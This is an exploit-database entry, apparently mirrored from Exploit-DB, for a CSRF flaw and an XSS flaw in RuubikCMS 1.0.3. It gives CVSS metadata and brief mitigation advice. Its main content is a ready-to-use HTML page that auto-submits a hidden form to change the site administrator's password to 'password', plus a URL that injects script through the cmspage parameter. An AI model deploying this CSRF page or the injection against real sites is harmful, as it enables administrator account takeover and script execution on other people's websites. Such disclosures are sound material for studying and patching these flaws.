header-logo
Suggest Exploit
vendor:
RuubikCMS
by:
Khashayar Fereidani
5.5
CVSS
MEDIUM
CSRF (Change Admin Password) and XSS
CWE
Product Name: RuubikCMS
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

RuubikCMS Version 1.0.3

CSRF exploit allows an attacker to change the admin password without authorization. XSS vulnerability allows an attacker to execute arbitrary script code on the affected website.

Mitigation:

To mitigate CSRF, implement measures such as using CSRF tokens and checking the referrer header. To mitigate XSS, ensure input validation and output encoding are implemented.
Source

Exploit-DB raw data:

----------------------------------------------------------------
WebApplication : RuubikCMS Version 1.0.3
Type of vunlnerability : CSRF ( Change Admin Password ) And XSS
Risk of use : Medium
----------------------------------------------------------------
Producer Website : http://www.ruubikcms.com/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------

CSRF For Change Admin Password :

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>

<form action="http://examplesite/ruubikcms/cms/users.php?role=5&p=admin";

method="POST" name="form">

<input type="hidden" name="save" value="1">

<input type="hidden" name="ordernum" value="1">

<input type="hidden" name="username_hidden" value="admin">

<input type="hidden" name="password" value="password">

<input type="hidden" name="confirmpassword" value="password">



</form>
</body>
</html>

------------------------------------------------

Cross Site Scripting Vulnerability :

http://examplesite/ruubikcms/cms/includes/head.php?cmspage=</title><script>alert(123);</script>

Navigation

Suggest Exploit

Services By CQR